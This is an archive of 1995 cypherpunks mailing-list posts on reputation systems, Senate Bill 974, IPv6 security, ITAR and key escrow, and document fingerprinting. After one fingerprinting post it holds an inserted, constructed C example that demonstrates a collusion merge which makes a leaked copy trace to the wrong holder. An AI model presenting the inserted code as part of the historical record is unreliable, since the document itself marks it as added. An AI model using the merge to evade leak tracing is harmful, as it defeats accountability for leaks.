>with one.

Nope.

>Or can you publish, and then say that's prior art, so no one else can
>go patent your idea.

This works.  IBM used to publish a monthly journal (I forget the
name, it came out of one of their Yorktown labs) that did exactly this
kind of thing for exactly this kind of reason.  Actually, they wrote
about stuff that they thought was 5-10 years away.

>> even phil zimmerman is selling the rights to pgp. what about all the
>> people who contributed code (like me) ... . ask phil
>> about me and when i asked about sharing profits from the code i
>> contributed. also about the deal with r.f...

Mr/Ms. Anonymous is lying.  His/her name appears nowhere in the credits,
and his/her code appears nowhere in any PGP release.  Don't waste any
neurons on it.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 10 Sep 95 16:10:30 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
Message-ID: <199509102310.TAA00342@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Good question, but a quick modification allows for effective
bootstrapping.  If I want to start consulting for Amalgameted
Consolodated, I can offer them a 10 free questions deal to bootstrap
things with.  Mallet can only cheat if my offer was broadcast.  (I 
presume that Amalagated' keys are somehow strongly verified, and the
negotiations are kept secret from Eve and Mallet.)

	There might also be fingerprinting technologies that allow me
to embed a signature in the documents returned to clients that would
allow me to show that Mallet stole them.  (Which might, incidentally,
get Mallet a job in some circles...If that's known, Bob and Alice can
collude to make it appear that Bob was Mallet, and thus forge a
reputation.)


Wei wrote:
| In an economy based on positive reputations, how does one acquire a 
| reputation capital?  One way may be to initially perform services at a 
| price below cost, but this has some problems.
| 
| For example, Alice starts an anonymous consulting service, and announces 
| that she will answer the first ten queries for free.  Upon hearing this, 
| Mallet immediately starts another consulting service, and announces the 
| same offer.  At this point Mallet can simply forward his customers' 
| queries to Alice and Alice's answers back to his customers.  Thus, he gains 
| reputation at no cost.
| 
| On the other hand, this "man-in-the-middle" attack can also work against
| conventional True Name based services, but perhaps with less effect.  Has
| anyone ever heard of this being done? 
| 
| Is there a better way to acquire a good reputation?
| 
| Wei Dai
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Sun, 10 Sep 95 17:25:06 PDT
To: cypherpunks@toad.com
Subject: Senate Bill 974
Message-ID: <Pine.BSI.3.91.950910190644.6485A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain



Senate Bill 974

The full text is difficult to interpret since it mostly just amends
other law. Essentially the law makes illegal: using a computer for
racketeering purposes, threatening to destroy data, transferring
of unlicensed software, using any method to hide illegal funds
transfer, and exporting crypto software. (Relevant bits are included below).
The law also expands wiretapping authority, and seems to allow electronic
evidence found during a search to be introduced as evidence.  You'll
have to insert the text of the bill into the real laws to get full
context.


                `(2) to distribute computer software that encodes or encrypts
              electronic or digital communications to computer networks that
              the person distributing the software knows or reasonably should
              know, is accessible to foreign nationals and foreign
              governments, regardless of whether such software has been
              designated as nonexportable;
                `(3) to use a computer or computer network to transmit a
              communication intended to conceal or hide the origin of money 
              or other assets, tangible or intangible, that were derived from
              racketeering activity; and
                `(4) to operate a computer or computer network primarily to
              facilitate racketeering activity or primarily to engage in
              conduct prohibited by Federal or State law.
            `(b) For purposes of this section, each act of distributing
          software is considered a separate predicate act. Each instance in
          which nonexportable software is accessed by a foreign government, 
          an agent of a foreign government, a foreign national, or an agent 
          of a foreign national, shall be considered as a separate predicate
            `(c) It shall be an affirmative defense to prosecution under this
          section that the software at issue used a universal decoding device
          or program that was provided to the Department of Justice prior to
          the distribution.'.


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 10 Sep 95 19:31:44 PDT
To: cypherpunks@toad.com
Subject: Re:  Digital Fingerprinting
Message-ID: <199509110229.TAA11621@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not sure how to do it for software, but for novels it should be easy
to fingerprint.  Every couple of pages the author writes a sentence twice
in different forms.  This would not take a great deal of extra effort on
the part of the author.  Software can then choose from the alternative
variations in different patterns to produce a unique fingerprint for
every copy.

There would seem to be two approaches to removing the fingerprint.
One would be re-writing every sentence in the novel.  The other would be
to collect enough copies to identify all of the sentences which have
variations.  Most of the mathematics of fingerprinting research is
oriented around figuring out how many different points of variation there
must be to be secure against a certain number of copies of the
fingerprinted item being compared.

Perhaps a similar approach could be applied to software, where in many
cases a couple of statements could be trivially interchanged, or other
kinds of simple transformations could be manually generated.  Those
could be marked by the programmers without too much extra work.

I agree with Doug that fully automated fingerprinting schemes which post
process "vanilla" documents are going to be forced to rely on security
through obscurity, probably a losing battle.  Also as Doug says the
viability of legal sanctions against the source of fingerprinted docs is
questionable.  Maybe it could work if you had just a few copies out and
the people who were given copies can be seriously held to non-disclosure
agreements.

Hal
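
The variant-sentence scheme and the copy-comparison problem from the message above, as an added example (not part of the original post). The sentence pairs, the choice of 8 variation points and all function names are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NPOINTS 8   /* variation points, so 2^8 distinguishable copies */

/* Constructed sample text: two interchangeable wordings per variation point. */
static const char *VARIANTS[NPOINTS][2] = {
    {"It rained all night.",   "All night it rained."},
    {"She said nothing.",      "Nothing was said by her."},
    {"The door was locked.",   "Someone had locked the door."},
    {"He left at dawn.",       "At dawn he left."},
    {"The letter never came.", "No letter ever came."},
    {"They met by the river.", "By the river they met."},
    {"Nobody saw him again.",  "He was never seen again."},
    {"The lamp went out.",     "Out went the lamp."},
};

/* Issue copy number `id`: bit i of id selects the wording at point i. */
void make_copy(uint32_t id, const char *copy[NPOINTS])
{
    for (int i = 0; i < NPOINTS; i++)
        copy[i] = VARIANTS[i][(id >> i) & 1u];
}

/* Read the fingerprint out of a leaked copy; -1 if a sentence was rewritten. */
long trace_copy(const char *copy[NPOINTS])
{
    long id = 0;
    for (int i = 0; i < NPOINTS; i++) {
        if (strcmp(copy[i], VARIANTS[i][1]) == 0)
            id |= 1L << i;
        else if (strcmp(copy[i], VARIANTS[i][0]) != 0)
            return -1;
    }
    return id;
}

/* What two holders learn by diffing their copies: a bitmask of the points
 * where the wording differs. Points where they agree stay invisible. */
uint32_t exposed_points(const char *a[NPOINTS], const char *b[NPOINTS])
{
    uint32_t mask = 0;
    for (int i = 0; i < NPOINTS; i++)
        if (strcmp(a[i], b[i]) != 0)
            mask |= 1u << i;
    return mask;
}

/* A merged copy: at each visible point the wording is taken alternately
 * from a and b; the invisible points are carried over unchanged. */
void merge_copies(const char *a[NPOINTS], const char *b[NPOINTS],
                  const char *out[NPOINTS])
{
    int take_a = 1;
    for (int i = 0; i < NPOINTS; i++) {
        out[i] = a[i];
        if (strcmp(a[i], b[i]) != 0) {
            out[i] = take_a ? a[i] : b[i];
            take_a = !take_a;
        }
    }
}

/* Number of variation points at which issued copy `id` agrees with a leak. */
int agreement(uint32_t id, long leaked)
{
    int n = 0;
    if (leaked < 0)
        return 0;
    for (int i = 0; i < NPOINTS; i++)
        if (((((uint32_t)leaked ^ id) >> i) & 1u) == 0)
            n++;
    return n;
}

/* Wrappers that work on copy numbers, for the demo below. */
long roundtrip(uint32_t id)
{
    const char *c[NPOINTS];
    make_copy(id, c);
    return trace_copy(c);
}

uint32_t collusion_exposed(uint32_t id_a, uint32_t id_b)
{
    const char *a[NPOINTS], *b[NPOINTS];
    make_copy(id_a, a);
    make_copy(id_b, b);
    return exposed_points(a, b);
}

long collusion_leak(uint32_t id_a, uint32_t id_b)
{
    const char *a[NPOINTS], *b[NPOINTS], *m[NPOINTS];
    make_copy(id_a, a);
    make_copy(id_b, b);
    merge_copies(a, b, m);
    return trace_copy(m);
}

int main(void)
{
    long leak = collusion_leak(0x35, 0x36);
    printf("points visible to holders of 0x35 and 0x36: 0x%02x\n",
           (unsigned)collusion_exposed(0x35, 0x36));
    printf("merged copy traces to 0x%02lx\n", (unsigned long)leak);
    printf("agreement with leak: 0x35=%d 0x36=%d 0x37=%d 0xCA=%d\n",
           agreement(0x35, leak), agreement(0x36, leak),
           agreement(0x37, leak), agreement(0xCA, leak));
    return 0;
}
```

Here the merged copy reads as 0x37, a copy neither holder was issued, while both real holders still agree with it at 7 of 8 points. With this few variation points an exact-match trace is unreliable, which is the counting problem the message refers to.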




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Sun, 10 Sep 95 17:06:34 PDT
To: "cypherpunks@toad.com>
Subject: RE: 64 bit crypto
Message-ID: <01BA7FB7.8CF32E40@dialin36.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


Couldn't we modify RC4 easily to provide the same
security against brute-force attacks by just running the key-setup phase
65536 times instead of just once?

Why would the attacker need to run the key setup 65536 times?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 10 Sep 95 17:10:11 PDT
To: cypherpunks@toad.com
Subject: IP6_pi2
Message-ID: <199509110010.UAA29842@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   IEEE Spectrum, September, 1995:


   Excerpt on Net security from "Upgrading the Internet," a
   roundtable discussion of the Internet Society on the next
   generation of Internet protocols, IP Version 6.

   Discussants: Vinton Cerf, Stephen Deering, Christian
   Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt,
   Lixia Zhang.

      A most important aspect of the IPv6 is the somewhat
      controversial decision to require that all v6
      implementations support strong privacy and strong
      authentication. At this level, all of the security
      problems won't be solved, but we can authenticate and
      maintain privacy of packets that flow from one machine
      to another. This will eliminate many security threats in
      the current Internet, such as source-address-spoofing,
      source-related routing attacks, password sniffing,
      connection hijacking, and so on.


   New Scientist, Sept 9, 1995: "Watching you, watching us."

      Companies that sell electronic surveillance equipment to
      repressive regimes face the prospect of being "outed" on
      the Internet this autumn. Two electronic watchdogs, the
      British group Privacy International (PI) and its
      American sister organisation the Electronic Privacy
      Information Centre (EPIC), are setting up an offshore
      Internet site that will name companies that sell
      electronic instruments of repression to governments with
      poor records on human rights.


   IPI-pair: IP6_pi2 (13kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Sep 95 20:26:09 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <ac78f5a804021004b64e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Many interesting points here...but I'll stick to just one:

At 2:56 AM 9/11/95, Douglas Barnes wrote:

>    On the legal front, it's not clear what you can do to someone
>    even if you _can_ prove that the 100,000 pirate copies of Windows
>    95 circulating in Amsterdam stemmed from his copy. Machines get
>    hacked, co-workers and family members often have free access to
>    machines running software -- it's not clear that media companies
>    _want_ to invoke the paranoia associated with potential responsibility
>    for millions of dollars in damages if someone makes an illegal copy
>    of one's software and the loaves and fishes ensue. [Imagine what
>    great revenge this would make for jealous co-workers, ex-wives, etc.]

If a piece of mail addressed to me is found littering the highway, can I be
convicted of littering? No, because the _provenance_ of that item of mail
cannot be determined...it might have accidentally blown out of a trash
truck delivering my mail to the dump, for example.

Ditto for most schemes to serialize software. As Doug notes, the offending
item might have been copied when I wasn't looking, copied by my girlfriend
when I was away, or even copied at the factory or at the software store
prior to my gaining control. Or copied after I discarded it.

(Requiring owners of Microsoft Word to treat it like a state secret--more
on state secrets in a minute--is impractical and unenforceable.)

One thing serialization could do is to allow proof that a distributor had
not acquired a particular copy/instance through normal channels. But it's
usually obvious anyway when Joe's Really Cheap Warez has 200 copies of
Microsoft Word, all with the same serial number.

The "light signatures" scheme I've written about here could be used to
authenticate the distribution media itself, though not the installed copies
of course. (This would be like the Microsoft hologram, except in spades.)
Since the technology for this is not available to home or business users, I
don't see this as a viable approach.

Another thing that could work to foil mass counterfeiters is to serialize
the diskettes and include a hash of the serial number, as some lottery
tickets now include. Counterfeiters could try two basic approaches:

1. Make up their own numbers. But they could not compute a valid hash, as
they lacked the (presumably secret) knowledge to do so. With public key
approaches, a customer could "authenticate" that at least Microsoft, say,
must have generated the number.

(This doesn't take care of multiple copies of the same serial number, which
takes us to:)

2. Multiple copies of a single, valid serial number. Here, the
counterfeiter directly copies both the serial number and its hash.

(This approach doesn't work to counterfeit lottery tickets. The reason is
left as an exercise for the reader.)

One way I can think of to head this off is to have a registry of "taken" or
"sold" numbers, in which serial numbers are deposited. A purchaser could
consult this data base to see if the number on the package he is planning
to buy is already registered. (There are complications about time delays,
and so forth, but this would eventually limit multiple same number
packages.)

This discussion assumes that purchasers are interested in getting valid,
non-counterfeit programs. Many are not, of course. Certain types of
programs pretty much require support by the vendor, others don't. A
standard discussion topic.

I said I'd mention "state secrets" again. The usual example for making
subtle modifications to documents to see who leaked it is the intelligence
community, which gave us the term "barium" (because the changes look like
barium in an x-ray diagnostic).

In that case, the agencies can enforce their laws in a draconian way,
sometimes merely by suspicion. And the workarounds we discuss, of DIFFing
the files, are unlikely to be practical. ("Hey, Sid, can I borrow your copy
of "Covert Operations in Bosnia" so I can DIFF it with my copy?")

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 10 Sep 95 17:58:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Senate Bill 974?
In-Reply-To: <Pine.BSI.3.91.950910183148.5633A-100000@usis.com>
Message-ID: <9509110058.AA24206@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Neal writes:
> Haven't seen it discussed here, but the August 28, 1995 issue of Lan
> Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974.

Actually, we considered S.974 (the Anti-Electronic Racketeering Act of 1995)
here in excruciating detail a couple of months ago. Check the archives from
e.g. July.

At last report, the bill had been referred to committee. If/when it ever
emerges from subcommittee, there's cause for concern. No mention of it has
been made in the Congressional Record since Sen. Jon Kyl of Arizona joined
as a cosponsor in late July. It doesn't currently appear on the unofficial
list of "hot bills" on Thomas -- "bills that have received or are receiving 
floor action and/or debate in the United States Congress" 
(http://thomas.loc.gov/home/hot-bill.html)  Hopefully it has died in
committee, as more pressing matters have taken precedence.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 17:59:31 PDT
To: cypherpunks@toad.com
Subject: Re: IP6_pi2
In-Reply-To: <199509110010.UAA29842@pipe2.nyc.pipeline.com>
Message-ID: <199509110059.UAA11623@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This was a very controversial move that Jeff Schiller had the
foresight to drive through. There are still arguments about it, but
overall it was a "good thing".

.pm

John Young writes:
>    Excerpt on Net security from "Upgrading the Internet," a
>    roundtable discussion of the Internet Society on the next
>    generation of Internet protocols, IP Version 6.
> 
>    Discussants: Vinton Cerf, Stephen Deering, Christian
>    Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt,
>    Lixia Zhang.
> 
>       A most important aspect of the IPv6 is the somewhat
>       controversial decision to require that all v6
>       implementations support strong privacy and strong
>       authentication. At this level, all of the security
>       problems won't be solved, but we can authenticate and
>       maintain privacy of packets that flow from one machine
>       to another. This will eliminate many security threats in
>       the current Internet, such as source-address-spoofing,
>       source-related routing attacks, password sniffing,
>       connection hijacking, and so on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew.spring@ping.be (Andrew.spring@ping.be)
Date: Wed, 20 Sep 95 17:18:23 PDT
To: cypherpunks@toad.com
Subject: RE: BIZDOS CITIZENSHIP?
Message-ID: <9509201549586314@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sun, 10 Sep 1995 22:11:28 +0100
To: cypherpunks@toad.com
From: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: Bizdos citizenship?

-----BEGIN PGP SIGNED MESSAGE-----

>In correspondence with someone outside the US regarding ITAR regulations,
>the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is
>this statement in the same class as an Elvis sighting?  Or if it is true,
>what impact would ITAR have on foreign nationals working for a US company
>involved with export restricted crypto?
>
>Please don't get carried away and turn this into a Net rumor.  I'm just
>curious if anyone on the list can confirm or deny the citizenship comment.

Jim Bidzos is a US Permanent Resident Alien and Greek citizen.  He has a
Green Card.  It doesn't have any ITAR impact, since the ITAR term 'Foreign
Person' doesn't include Green Carded Resident Aliens.

It probably wouldn't have any impact anyway, since he's a business weenie,
and not a software weenie.  Now, if he had a _programmer_ that wasn't a US
Citizen, that would be a-whole-nother kettle of fish.

He's previously stated that he would become a US Citizen, if it were not for
the fact that Greece would require him to give up his Greek (and hence his
EC) citizenship.  See Simson Garfinkel's book on PGP for more details.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFMZFI4k1+54BopBAQGK7gP+Oq+FjqjCeQziC16Ryq64i1tXMAhV/jaX
86TBumss/GPpaVfLGtDS3FZARK9eTo4gVPTfABtvIa/u6QzZGL9zCT5z5nWT5QJ4
Koj5jnGsnNpXx3YGa1bJfZOI4ctkRovPWpyPa4jWOEooJz5UbvCCwGW/YoYMlvCs
sQ//Qs7uDPs=
=ARLj
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:51:07 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


  Hal Finney wrote:

> I'm not sure how to do it for software, but for novels it
> should be easy to fingerprint.  Every couple of pages the
> author writes a sentence twice in different forms.  This would
> not take a great deal of extra effort on the part of the
> author.

  Perhaps.  Some authors might be offended by the idea that
using a different form of a sentence doesn't affect the work.

> Perhaps a similar approach could be applied to software, where
> in many cases a couple of statements could be trivially
> interchanged, or other kinds of simple transformations could
> be manually generated.  Those could be marked by the
> programmers without too much extra work.

  Sounds like a disaster to me, unless it can be done
automatically, by a proven-correct program.  I used to use
commercial compilers that (at least claimed to) put their
"stamp" on the assembly code they generated, so they could sue
if you released a product without having a license for the
compiler.  Bugs are bad enough as it is; we don't need extra
ones that only show up in some copies!


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 10 Sep 95 18:55:45 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
Message-ID: <9509110155.AA25082@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:
> On the other hand, this "man-in-the-middle" attack can also work against
> conventional True Name based services, but perhaps with less effect.  Has
> anyone ever heard of this being done? 

Undoubtedly -- this is a factor in the abundance of "no sales to dealers"
and "limit N per customer" in sales advertisements. 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 10 Sep 95 22:05:43 PDT
To: weidai@eskimo.com
Subject: Re: question about reputation
Message-ID: <199509110502.AA29554@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:

> For example, Alice starts an anonymous consulting service, and announces 
> that she will answer the first ten queries for free.  Upon hearing this, 
> Mallet immediately starts another consulting service, and announces the 
> same offer.  At this point Mallet can simply forward his customers' 
> queries to Alice and Alice's answers back to his customers.  Thus, he gains 
> reputation at no cost.

Well, long term he won't be able to keep it - what will he do when Alice
starts charging for her services? He can charge more than she does, and
they'll have equivalent "accuracy ratings" but Alice will provide her
services more cheaply - or he can stop asking Alice and make up his own
answers (or not answer) and his reputation will drop quickly. 

While I admit that I'd be pissed off if I were Alice, Mallet isn't
really harming her - she gets business at the rate she's established.
If Mallet's customers and Alice's don't overlap (maybe Mallet speaks/
writes in a different language, or has different friends) then it's
arguable that Mallet is doing Alice a favor. If Mallet continues to
purchase answers from Alice (even if he charges his customers more)
his reputation isn't really false, if you think of it as meaning
"can provide good answers to questions" versus "can figure out good
answers to questions by himself". 

More proactively, Alice might choose to publish the questions and 
answers publicly (the customers are, after all, anonymous,
and only revealing as much about themselves as they'd reveal to an
unknown party - Alice could sanitize the questions of identifying
facts even further, if appropriate) - this would prove her aptitude 
(or lack thereof) to a wider audience, and Mallet's customers could
notice that she was providing answers to their questions (how did
she know of their questions?) before Mallet does. 

Alice could also choose to answer questions for free, but only to
named and well-known parties with good reputations. This is a 
standard trick for new consultants/businesses - work cheap or free
for a person or business that comes in contact with many people or
gets lots of publicity. Cochran, Shapiro, et al could make a fortune
from the Simpson trial even if they didn't charge OJ a dime - 
people charged with serious crimes will be calling them for years to
come because of their media exposure. If Alice is paranoid, the 
well-known party could post a bond with an escrow agent, to be 
returned when they posted a public evaluation of Alice's services. 

> On the other hand, this "man-in-the-middle" attack can also work against
> conventional True Name based services, but perhaps with less effect. Has
> anyone ever heard of this being done? 

This "man-in-the-middle attack" is called, variously, arbitrage or
capitalism. :) You've rediscovered Marx' surplus value theory of
labor. (shh, don't say any more, or someone will say we're using
language wrong.)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFPCmH3YhjZY3fMNAQEzTAP/dJFeg828BVuqS06deN15ILrX/13q2iSa
seMCWXJMxOmRPS+oS7vbJtJ8jIhEJVlg+p9Un/rstD4QM7q6PRgKw9daq5LMav3y
S+i0sYKEBnMmF+q5Ocm6EshHCAYs9sQOkM7hxr0rq0vhX3onFlpAIVBmUhz4BjtX
YtoSpLWQ62U=
=i8Zt
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 10 Sep 95 19:07:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910164221.8377C-100000@eskimo.com>
Message-ID: <9509110207.AA25237@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
# Good question, but a quick modification allows for effective
# bootstrapping.  If I want to start consulting for Amalgameted
# Consolodated, I can offer them a 10 free questions deal to bootstrap
# things with.  Mallet can only cheat if my offer was broadcast.

Wei Dai writes:
> This scheme doesn't quite work.  (Let's call Amalgameted Bob, to keep
> names short.)  Bob can create a new, unlinkable pseudonym and give the same
> offer to Carol under the new pseudonym.  Then, Bob acts as Mallet and
> passes messages back and forth between Alice and Carol.  

If all Alice's prospective customers are also resellers on the side, then I
agree that she has a problem. But how realistic is a market scenario in which
a new supplier cannot positively identify some legitimate end consumers of a
product or service ?  (I'm ignoring cases in which the market for the
product or service is only just being forged.)  This strikes me as rather
implausible, although I don't claim to have devoted a great deal of thought
to it.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 10 Sep 95 13:10:58 PDT
To: cypherpunks@toad.com
Subject: Re: Bizdos citizenship?
Message-ID: <v01510100ac78c76f2125@[193.74.217.15]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>In correspondence with someone outside the US regarding ITAR regulations,
>the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is
>this statement in the same class as an Elvis sighting?  Or if it is true,
>what impact would ITAR have on foreign nationals working for a US company
>involved with export restricted crypto?
>
>Please don't get carried away and turn this into a Net rumor.  I'm just
>curious if anyone on the list can confirm or deny the citizenship comment.

Jim Bidzos is a US Permanent Resident Alien and Greek citizen.  He has a
Green Card.  It doesn't have any ITAR impact, since the ITAR term 'Foreign
Person' doesn't include Green Carded Resident Aliens.

It probably wouldn't have any impact anyway, since he's a business weenie,
and not a software weenie.  Now, if he had a _programmer_ that wasn't a US
Citizen, that would be a-whole-nother kettle of fish.

He's previously stated that he would become a US Citizen, if it were not for
the fact that Greece would require him to give up his Greek (and hence his
EC) citizenship.  See Simson Garfinkel's book on PGP for more details.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFMZFI4k1+54BopBAQGK7gP+Oq+FjqjCeQziC16Ryq64i1tXMAhV/jaX
86TBumss/GPpaVfLGtDS3FZARK9eTo4gVPTfABtvIa/u6QzZGL9zCT5z5nWT5QJ4
Koj5jnGsnNpXx3YGa1bJfZOI4ctkRovPWpyPa4jWOEooJz5UbvCCwGW/YoYMlvCs
sQ//Qs7uDPs=
=ARLj
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sun, 10 Sep 95 19:26:36 PDT
To: cypherpunks@toad.com
Subject: Re: not a flame please read and think about this
Message-ID: <v01520c02ac794e45100d@[199.227.2.141]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rich said
>>> even phil zimmerman is selling the rights to pgp. what about all the
>>> people who contributed code (like me) ... . ask phil
>>> about me and when i asked about sharing profits from the code i
>>> contributed. also about the deal with r.f...
>
>Mr/Ms. Anonymous is lying.  His/her name appears nowhere in the credits,
>and his/her code appears nowhere in any PGP release.  Don't waste any
>neurons on it.

Let Anonymous have a share of prz's legal bills as well.  No matter how much
Phil is getting from licensing, somehow I doubt he is netting a profit...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMFOfeGGnwFiC3O2NAQHedwf/T9QOEUBdX7DZx1ygdk4/Us2wmiYQiDUG
PZxht4G+66aYO/7IYwxIES9ksAvCP/vZJ14a55Lc+NJABFnMe/eJrbXmNSjyGdFP
hoHUXGWv3BJDpx6QvhapDFoAsG0b0KgDQMpG2/6s9VPKsDoNNioUDzvpV4lh7fNh
RhjO1yA1dYHVcW2ihICByw/e43aU35xhrDhzFm/9ExtVT2STMGvnTso3Pgj/oAqa
Szbj2AzKp6NmI+BdfWrZmdFcFdji8toQ5AtUmBY1gBU1DbDZzdV8BiDYnMJfbcyH
TIKxU4xPWpXi3WjfE37CsPnxGv+ASylHuCUpanldKaz3y03hRawIBQ==
=3Pw7
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sun, 10 Sep 95 21:43:09 PDT
To: cypherpunks@toad.com
Subject: Re: Document Fingerprinting
Message-ID: <199509110443.WAA00476@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Will French:

>  Sounds like a disaster to me, unless it can be done
>automatically, by a proven-correct program.  I used to use
>commercial compilers that (at least claimed to) put their
>"stamp" on the assembly code they generated, so they could sue
>if you released a product without having a license for the
>compiler.  Bugs are bad enough as it is; we don't need extra
>ones that only show up in some copies!

I seem to recall a lawsuit where somebody like Tandy was suing
somebody else, claiming they copied the computer's rom code.

As proof they pulled out the competitor's computer, pressed a
certain key combination, and the Tandy copyright flashed up on
the screen. As I also recall, they LOST the suit believe it or
not...

Anybody heard of this? Circa 1988-1991 I believe. Sure shows
what a slick lawyer can get you out of...

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFO+acLa+QKZS485AQFNCQL+L/HtUtC//QAi8II8Ktf7bZjSt3YRdmBf
/zNieoiM5buZDAlC/GHR4bw4RJl5qWbY33r8QB4akR4b108Fvf0BxkUCgPmdI95f
f+MHqxcRLfwgcoj0XiwxMrR9pQyJEv4B
=8myc
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Sep 95 22:57:31 PDT
To: cypherpunks@toad.com
Subject: Re: GAK Advisory Board
Message-ID: <ac7917e105021004c095@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to "Anonymous" for sending this to us. I visited the site,
http://csrc.ncsl.nist.gov/csspab, and there seem to be some interesting
things there.

At 4:50 AM 9/11/95, Anonymous wrote:

>Status of Key Escrow Initiative
>
>Mr. Steve Walker, Trusted Information Systems (TIS),
>briefed the Board on the status of Commercial Key Escrow
>(CKE).  He said, with regard to application vendors, TIS
...
>Mr. Walker said the advantages of CKE for government
>interests is that if the TIS CKE system were to become
>widely used throughout the private sector and government
>communities, law enforcement, national security and
>private sector interests would be preserved.

If Data Recovery Centers are indeed completely choosable by the users, as
certain statements by TIS folks have asserted, then how would "law
enforcement" and "national security" interests be "preserved"?

(I can tell you that BlackNet won't be using any government-approved DRCs.
Nor will Kizer Sose be using any registered and licensed DRCs. If people
are free to pick DRCs--the only option a free society can support--the
